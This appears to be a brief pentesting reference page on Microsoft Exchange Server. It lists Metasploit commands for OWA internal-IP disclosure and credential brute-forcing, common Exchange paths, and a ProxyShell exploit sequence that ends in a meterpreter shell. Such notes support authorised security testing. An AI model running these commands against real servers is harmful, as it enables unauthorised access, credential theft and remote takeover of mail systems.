# Microsoft Exchange Server Pentesting

Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft.

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### OWA (Outlook Web Access) <a href="#owa-outlook-web-access" id="owa-outlook-web-access"></a>

```shellscript
msfconsole
# Client Access Server (CAS) IIS HTTP Internal IP Disclosure
msf> use auxiliary/scanner/http/owa_iis_internal_ip
# Brute Force credentials
msf> use auxiliary/scanner/http/owa_login
```

### Common Directories <a href="#common-directories" id="common-directories"></a>

```shellscript
# Autodiscover service
/autodiscover/
/autodiscover/autodiscover.xml
# Enhanced Client or Proxy
/ecp/
# Exchange Web Services
/ews/
# Offline Address Books
/oab/
# Outlook Web Access
/owa/
/owa/auth/login.aspx
```

### ProxyShell RCE <a href="#proxyshell-rce" id="proxyshell-rce"></a>

CVE-2021-31207, CVE-2021-34523, CVE-2021-34473 Reference: <https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>

```shellscript
msfconsole
msf> use exploit/windows/http/exchange_proxyshell_rce
msf> (set options...)
msf> exploit
meterpreter> shell
```

### References <a href="#references" id="references"></a>

* [Microsoft Learn](https://learn.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019)